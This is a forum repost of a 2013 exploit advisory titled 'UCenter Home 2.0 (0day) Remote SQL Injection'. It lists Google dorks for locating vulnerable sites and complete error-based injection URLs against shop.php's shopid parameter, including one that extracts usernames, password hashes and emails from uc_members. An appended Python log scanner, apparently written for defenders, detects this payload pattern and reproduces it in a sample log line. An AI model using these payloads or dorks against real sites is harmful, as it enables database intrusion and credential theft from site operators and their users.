China Network Penetration Testing Alliance

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31
Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon, BARCOD3, RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit your DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
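Added example for defenders, not part of the post above and not UCenter's own code: a Python scan over constructed Apache access-log lines that flags requests to shop.php whose `shopid` parameter is not a plain integer and that carry the error-based "double query" signature (`count(*)` + `floor(rand(0)*2)` + `GROUP BY`) used in the advisory. The log lines, IP addresses and function names are constructed for illustration; the server-side fix is the usual one of casting `shopid` to an integer before it reaches SQL.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = r'''
203.0.113.5 - - [27/Feb/2013:21:31:00 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Feb/2013:21:31:04 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat((select%20concat(0x7e,unhex(hex(database())),0x7e)%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Feb/2013:21:31:09 +0800] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 4800 "-" "curl/7.29"
203.0.113.9 - - [27/Feb/2013:21:31:12 +0800] "GET /index.php HTTP/1.1" 200 2000 "-" "curl/7.29"
'''

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature of the error-based double-query technique: count(*) aggregated over
# floor(rand(0)*2) with GROUP BY forces a duplicate-key error that echoes the value.
DOUBLE_QUERY_RE = re.compile(r'count\(\*\).*floor\(rand\(0\)\*2\).*group\s+by', re.I | re.S)

def inspect_request(target):
    """Return the reasons a request to shop.php looks like an injection attempt."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/shop.php'):
        return []
    reasons = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get('shopid', []):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads
        if not value.isdigit():    # a safe shopid is a bare integer (intval() server-side)
            reasons.append('non-numeric shopid')
        if DOUBLE_QUERY_RE.search(value):
            reasons.append('error-based double-query pattern')
        if re.search(r'information_schema|uc_members', value, re.I):
            reasons.append('schema/table enumeration')
    return reasons

def scan_log(text):
    """Return (ip, status, reasons) for every suspicious request in an access log."""
    hits = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group('target'))
        if reasons:
            hits.append((m.group('ip'), int(m.group('status')), reasons))
    return hits

if __name__ == '__main__':
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, ', '.join(reasons))
```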
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2